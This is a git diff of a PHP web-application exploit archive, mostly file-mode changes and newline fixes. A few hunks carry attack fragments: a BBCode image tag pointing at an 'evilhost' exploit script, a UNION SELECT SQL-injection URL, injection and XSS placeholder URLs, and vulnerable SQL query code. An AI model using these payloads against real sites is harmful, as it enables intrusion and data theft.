100644 diff --git a/platforms/php/webapps/17627.txt b/platforms/php/webapps/17627.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17628.txt b/platforms/php/webapps/17628.txt old mode 100755 new mode 100644 index dc0894e9b..088a10308 --- a/platforms/php/webapps/17628.txt +++ b/platforms/php/webapps/17628.txt @@ -32,4 +32,4 @@ $query = "SELECT p.*, a.term_order FROM " . $table_prefix . "posts p inner join " . $table_prefix . "terms tt on ttt.term_id = tt.term_id where ttt.taxonomy='media_category' $where order by a.term_order asc;"; -$results = mysql_query($query); \ No newline at end of file +$results = mysql_query($query); \ No newline at end of file diff --git a/platforms/php/webapps/17629.txt b/platforms/php/webapps/17629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1763.txt b/platforms/php/webapps/1763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17630.txt b/platforms/php/webapps/17630.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17631.txt b/platforms/php/webapps/17631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17633.txt b/platforms/php/webapps/17633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17637.txt b/platforms/php/webapps/17637.txt old mode 100755 new mode 100644 index 4e1ed771e..df3a91427 --- a/platforms/php/webapps/17637.txt +++ b/platforms/php/webapps/17637.txt @@ -39,4 +39,4 @@ if($_GET[1]){ //Show the image } ///////////////////////////////////////////////////// Use: -[url=http://evilhost/exploit.php][img]http://evilhost/exploit.php?1=1[/img][/url] \ No newline at end of file +[url=http://evilhost/exploit.php][img]http://evilhost/exploit.php?1=1[/img][/url] \ No newline at end of file diff --git a/platforms/php/webapps/17639.txt b/platforms/php/webapps/17639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1764.txt b/platforms/php/webapps/1764.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17640.txt b/platforms/php/webapps/17640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17644.txt b/platforms/php/webapps/17644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17646.txt b/platforms/php/webapps/17646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17660.txt b/platforms/php/webapps/17660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17661.txt b/platforms/php/webapps/17661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17662.txt b/platforms/php/webapps/17662.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17666.txt b/platforms/php/webapps/17666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17667.php b/platforms/php/webapps/17667.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1767.txt b/platforms/php/webapps/1767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17673.txt b/platforms/php/webapps/17673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17674.txt b/platforms/php/webapps/17674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17675.txt b/platforms/php/webapps/17675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17677.txt b/platforms/php/webapps/17677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17678.txt b/platforms/php/webapps/17678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17679.txt b/platforms/php/webapps/17679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1768.php b/platforms/php/webapps/1768.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17680.txt b/platforms/php/webapps/17680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17681.txt b/platforms/php/webapps/17681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17682.php b/platforms/php/webapps/17682.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17683.txt b/platforms/php/webapps/17683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17684.txt b/platforms/php/webapps/17684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17685.txt b/platforms/php/webapps/17685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17686.txt b/platforms/php/webapps/17686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17687.txt b/platforms/php/webapps/17687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17688.txt b/platforms/php/webapps/17688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17689.txt b/platforms/php/webapps/17689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1769.txt b/platforms/php/webapps/1769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17694.txt b/platforms/php/webapps/17694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17695.txt b/platforms/php/webapps/17695.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17703.txt b/platforms/php/webapps/17703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17704.txt b/platforms/php/webapps/17704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17705.txt b/platforms/php/webapps/17705.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17706.pl b/platforms/php/webapps/17706.pl index 7a05a18ee..020f36850 100755 --- a/platforms/php/webapps/17706.pl +++ b/platforms/php/webapps/17706.pl @@ -223,4 +223,4 @@ goto menu; sub quit { exit(1); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/17707.txt b/platforms/php/webapps/17707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17708.txt b/platforms/php/webapps/17708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17709.txt b/platforms/php/webapps/17709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17710.txt b/platforms/php/webapps/17710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17714.txt b/platforms/php/webapps/17714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17716.txt b/platforms/php/webapps/17716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17720.txt b/platforms/php/webapps/17720.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17724.txt b/platforms/php/webapps/17724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17725.txt b/platforms/php/webapps/17725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17728.txt b/platforms/php/webapps/17728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17729.txt b/platforms/php/webapps/17729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1773.txt b/platforms/php/webapps/1773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17730.txt b/platforms/php/webapps/17730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17731.txt b/platforms/php/webapps/17731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17734.txt b/platforms/php/webapps/17734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17736.txt b/platforms/php/webapps/17736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17737.txt b/platforms/php/webapps/17737.txt old mode 100755 new mode 100644 index 14ea5d05b..24cc75232 --- a/platforms/php/webapps/17737.txt +++ b/platforms/php/webapps/17737.txt @@ -16,5 +16,4 @@ Vulnerable code if($_REQUEST['action']=="activate"){ $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']); ... - $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'"; - \ No newline at end of file + $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'"; \ No newline at end of file diff --git a/platforms/php/webapps/17738.txt b/platforms/php/webapps/17738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17739.txt b/platforms/php/webapps/17739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1774.txt b/platforms/php/webapps/1774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17740.txt b/platforms/php/webapps/17740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17741.txt b/platforms/php/webapps/17741.txt old mode 100755 new mode 100644 index 782b0f6be..5b504b881 --- a/platforms/php/webapps/17741.txt +++ b/platforms/php/webapps/17741.txt @@ -29,4 +29,4 @@ demo url :http://server/mailerd4/admin/contacts.php?op=[xss] ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/17748.txt b/platforms/php/webapps/17748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17749.txt b/platforms/php/webapps/17749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17750.txt b/platforms/php/webapps/17750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17751.txt b/platforms/php/webapps/17751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17752.txt b/platforms/php/webapps/17752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17753.txt b/platforms/php/webapps/17753.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17755.txt b/platforms/php/webapps/17755.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17756.txt b/platforms/php/webapps/17756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17757.txt b/platforms/php/webapps/17757.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17758.txt b/platforms/php/webapps/17758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17759.txt b/platforms/php/webapps/17759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17760.txt b/platforms/php/webapps/17760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17761.txt b/platforms/php/webapps/17761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17763.txt b/platforms/php/webapps/17763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17764.txt b/platforms/php/webapps/17764.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17767.txt b/platforms/php/webapps/17767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1777.php b/platforms/php/webapps/1777.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17771.txt b/platforms/php/webapps/17771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17773.txt b/platforms/php/webapps/17773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17774.txt b/platforms/php/webapps/17774.txt old mode 100755 new mode 100644 index aced39f1a..603e93a82 --- a/platforms/php/webapps/17774.txt +++ b/platforms/php/webapps/17774.txt @@ -14,4 +14,4 @@ ---------------------------------------------------------- Greets to my friend Sirus and all TeaM KuWaiT HaCkErS ;) ----------------------------------------------------------- \ No newline at end of file +---------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/17778.txt b/platforms/php/webapps/17778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17779.txt b/platforms/php/webapps/17779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1778.txt b/platforms/php/webapps/1778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17782.txt b/platforms/php/webapps/17782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17786.txt b/platforms/php/webapps/17786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17789.txt b/platforms/php/webapps/17789.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1779.txt b/platforms/php/webapps/1779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17790.txt b/platforms/php/webapps/17790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17791.txt b/platforms/php/webapps/17791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17792.txt b/platforms/php/webapps/17792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17793.txt b/platforms/php/webapps/17793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17794.txt b/platforms/php/webapps/17794.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17797.txt b/platforms/php/webapps/17797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17798.txt b/platforms/php/webapps/17798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1780.php b/platforms/php/webapps/1780.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17800.txt b/platforms/php/webapps/17800.txt old mode 100755 new mode 100644 index 830863422..a211938e4 --- a/platforms/php/webapps/17800.txt +++ b/platforms/php/webapps/17800.txt @@ -26,4 +26,4 @@ greats 2 >>> alm3refh.com - tryag.cc - joood T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 & orange man -infofst & virus hima & Karar aLShaMi & b0x & all alm3refh group \ No newline at end of file +infofst & virus hima & Karar aLShaMi & b0x & all alm3refh group \ No newline at end of file diff --git a/platforms/php/webapps/17807.txt b/platforms/php/webapps/17807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17808.txt b/platforms/php/webapps/17808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17809.txt b/platforms/php/webapps/17809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17811.txt b/platforms/php/webapps/17811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17813.txt b/platforms/php/webapps/17813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17814.txt b/platforms/php/webapps/17814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17816.txt b/platforms/php/webapps/17816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17818.txt b/platforms/php/webapps/17818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17822.txt b/platforms/php/webapps/17822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17823.txt b/platforms/php/webapps/17823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17824.txt b/platforms/php/webapps/17824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17825.txt b/platforms/php/webapps/17825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17828.txt b/platforms/php/webapps/17828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17829.txt b/platforms/php/webapps/17829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17832.txt b/platforms/php/webapps/17832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1785.php b/platforms/php/webapps/1785.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17850.txt b/platforms/php/webapps/17850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17851.txt b/platforms/php/webapps/17851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17852.txt b/platforms/php/webapps/17852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17857.txt b/platforms/php/webapps/17857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17858.txt b/platforms/php/webapps/17858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17859.txt b/platforms/php/webapps/17859.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17860.txt b/platforms/php/webapps/17860.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17861.txt b/platforms/php/webapps/17861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17862.txt b/platforms/php/webapps/17862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17863.txt b/platforms/php/webapps/17863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17864.txt b/platforms/php/webapps/17864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17865.txt b/platforms/php/webapps/17865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17866.txt b/platforms/php/webapps/17866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17867.txt b/platforms/php/webapps/17867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17868.txt b/platforms/php/webapps/17868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17869.txt b/platforms/php/webapps/17869.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17872.txt b/platforms/php/webapps/17872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17882.php b/platforms/php/webapps/17882.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17887.txt b/platforms/php/webapps/17887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17888.txt b/platforms/php/webapps/17888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1789.txt b/platforms/php/webapps/1789.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17891.txt b/platforms/php/webapps/17891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17894.txt b/platforms/php/webapps/17894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17895.txt b/platforms/php/webapps/17895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17898.txt b/platforms/php/webapps/17898.txt old mode 100755 new mode 100644 index c2c779832..92ece8d1e --- a/platforms/php/webapps/17898.txt +++ b/platforms/php/webapps/17898.txt @@ -11,4 +11,4 @@ [ Example ] http://www.example.com/product.php?prodID=9999 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- ##################################################################### [Thank's to][*] All member and Staff Indonesian Blackcoder[*] My Master : sudden_death (terimakasih atas ilmunya)[*] Special to ex member suramcrew: Kodok ijo, Gisa Maho, Lukas Bling, Pasukan dari Sempax, Zero-Line, Aanz, anharku, hakz -[Note][*] Aku sayang Ibu :) \ No newline at end of file +[Note][*] Aku sayang Ibu :) \ No newline at end of file diff --git a/platforms/php/webapps/1790.txt b/platforms/php/webapps/1790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17905.txt b/platforms/php/webapps/17905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17906.txt b/platforms/php/webapps/17906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17909.txt b/platforms/php/webapps/17909.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17911.php b/platforms/php/webapps/17911.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17919.txt b/platforms/php/webapps/17919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17920.txt b/platforms/php/webapps/17920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17925.txt b/platforms/php/webapps/17925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17926.txt b/platforms/php/webapps/17926.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17927.txt b/platforms/php/webapps/17927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17935.txt b/platforms/php/webapps/17935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17937.txt b/platforms/php/webapps/17937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17938.txt b/platforms/php/webapps/17938.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17943.txt b/platforms/php/webapps/17943.txt old mode 100755 new mode 100644 index 9213d832d..bfca9bef4 --- a/platforms/php/webapps/17943.txt +++ b/platforms/php/webapps/17943.txt @@ -28,6 +28,4 @@ bd0rk's-Fixtip: Percolate the l-parameter before $_GET -Greetings from Germany, the 22 years old bd0rk. - - \ No newline at end of file +Greetings from Germany, the 22 years old bd0rk. \ No newline at end of file diff --git a/platforms/php/webapps/17944.txt b/platforms/php/webapps/17944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17946.txt b/platforms/php/webapps/17946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1795.txt b/platforms/php/webapps/1795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17950.txt b/platforms/php/webapps/17950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17951.txt b/platforms/php/webapps/17951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17952.txt b/platforms/php/webapps/17952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17955.txt b/platforms/php/webapps/17955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17956.txt b/platforms/php/webapps/17956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17957.txt b/platforms/php/webapps/17957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17958.txt b/platforms/php/webapps/17958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17959.txt b/platforms/php/webapps/17959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1796.php b/platforms/php/webapps/1796.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17961.txt b/platforms/php/webapps/17961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17962.txt b/platforms/php/webapps/17962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1797.php b/platforms/php/webapps/1797.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17970.txt b/platforms/php/webapps/17970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17972.txt b/platforms/php/webapps/17972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17973.txt b/platforms/php/webapps/17973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1798.txt b/platforms/php/webapps/1798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17980.txt b/platforms/php/webapps/17980.txt old mode 100755 new mode 100644 index 200c1fdd6..466f1d7f2 --- a/platforms/php/webapps/17980.txt +++ b/platforms/php/webapps/17980.txt @@ -76,5 +76,4 @@ Patch FROM $settings_table_name ! WHERE form_id = ".$wpcf_easyform_formid." ORDER BY position - "); - \ No newline at end of file + "); \ No newline at end of file diff --git a/platforms/php/webapps/17983.txt b/platforms/php/webapps/17983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17984.txt b/platforms/php/webapps/17984.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17987.txt b/platforms/php/webapps/17987.txt old mode 100755 new mode 100644 index edbd49868..30728c0bc --- a/platforms/php/webapps/17987.txt +++ b/platforms/php/webapps/17987.txt @@ -88,4 +88,4 @@ The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-012.pdf Other Sense of Security advisories can be found at: -http://www.senseofsecurity.com.au/research/it-security-advisories.php \ No newline at end of file +http://www.senseofsecurity.com.au/research/it-security-advisories.php \ No newline at end of file diff --git a/platforms/php/webapps/17989.txt b/platforms/php/webapps/17989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17992.txt b/platforms/php/webapps/17992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17994.php b/platforms/php/webapps/17994.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17995.txt b/platforms/php/webapps/17995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17997.txt b/platforms/php/webapps/17997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17998.txt b/platforms/php/webapps/17998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/17999.txt b/platforms/php/webapps/17999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1800.txt b/platforms/php/webapps/1800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18000.txt b/platforms/php/webapps/18000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18001.txt b/platforms/php/webapps/18001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18002.txt b/platforms/php/webapps/18002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18003.txt b/platforms/php/webapps/18003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18004.txt b/platforms/php/webapps/18004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18018.php b/platforms/php/webapps/18018.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18020.txt b/platforms/php/webapps/18020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18021.php b/platforms/php/webapps/18021.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18022.txt b/platforms/php/webapps/18022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18033.txt b/platforms/php/webapps/18033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18035.txt b/platforms/php/webapps/18035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18036.txt b/platforms/php/webapps/18036.txt old mode 100755 new mode 100644 index 06ad55102..329a70d39 --- a/platforms/php/webapps/18036.txt +++ b/platforms/php/webapps/18036.txt @@ -223,5 +223,4 @@ [09/10/2011] - Others vulnerabilities discovered [11/10/2011] - Issues reported to http://bugs.efrontlearning.net/browse/EF-675 [26/10/2011] - Vendor update released: http://forum.efrontlearning.net/viewtopic.php?t=3501 - [27/10/2011] - Public disclosure - \ No newline at end of file + [27/10/2011] - Public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/18039.txt b/platforms/php/webapps/18039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1804.txt b/platforms/php/webapps/1804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18042.txt b/platforms/php/webapps/18042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18045.txt b/platforms/php/webapps/18045.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18046.txt b/platforms/php/webapps/18046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18047.txt b/platforms/php/webapps/18047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18048.txt b/platforms/php/webapps/18048.txt old mode 100755 new mode 100644 index 560c8f8dc..38a348727 --- a/platforms/php/webapps/18048.txt +++ b/platforms/php/webapps/18048.txt @@ -50,4 +50,4 @@ parameter [imm]: Discovered by. -Chris Russell \ No newline at end of file +Chris Russell \ No newline at end of file diff --git a/platforms/php/webapps/18050.txt b/platforms/php/webapps/18050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18053.txt b/platforms/php/webapps/18053.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18055.txt b/platforms/php/webapps/18055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18056.txt b/platforms/php/webapps/18056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18058.txt b/platforms/php/webapps/18058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18063.txt b/platforms/php/webapps/18063.txt old mode 100755 new mode 100644 index f29e852bc..41add25ac --- a/platforms/php/webapps/18063.txt +++ b/platforms/php/webapps/18063.txt @@ -22,5 +22,4 @@ # # http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL) # -################################################################################################ - \ No newline at end of file +################################################################################################ \ No newline at end of file diff --git a/platforms/php/webapps/18065.txt b/platforms/php/webapps/18065.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18066.txt b/platforms/php/webapps/18066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18069.txt b/platforms/php/webapps/18069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18070.txt b/platforms/php/webapps/18070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18075.txt b/platforms/php/webapps/18075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18076.txt b/platforms/php/webapps/18076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1808.txt b/platforms/php/webapps/1808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18081.txt b/platforms/php/webapps/18081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18083.php b/platforms/php/webapps/18083.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18084.php b/platforms/php/webapps/18084.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18085.php b/platforms/php/webapps/18085.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18088.txt b/platforms/php/webapps/18088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1809.txt b/platforms/php/webapps/1809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18090.txt b/platforms/php/webapps/18090.txt old mode 100755 new mode 100644 index e8615b74d..b425db4a8 --- a/platforms/php/webapps/18090.txt +++ b/platforms/php/webapps/18090.txt @@ -24,10 +24,4 @@ http://localhost/labstore/stocks/interface_creator/index.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC http://localhost/labstore/stocks/interface_creator/index_long.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC - http://localhost/labstore/stocks/interface_creator/index_short.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC - - - - - - \ No newline at end of file + http://localhost/labstore/stocks/interface_creator/index_short.php?table_name=proteins&function=search&where_clause=[SQL INJECTION]&page=0&order=nature&order_type=ASC \ No newline at end of file diff --git a/platforms/php/webapps/18091.txt b/platforms/php/webapps/18091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18095.txt b/platforms/php/webapps/18095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18099.txt b/platforms/php/webapps/18099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/18100.txt b/platforms/php/webapps/18100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1811.php b/platforms/php/webapps/1811.php old mode 100755 new mode 100644 diff --git 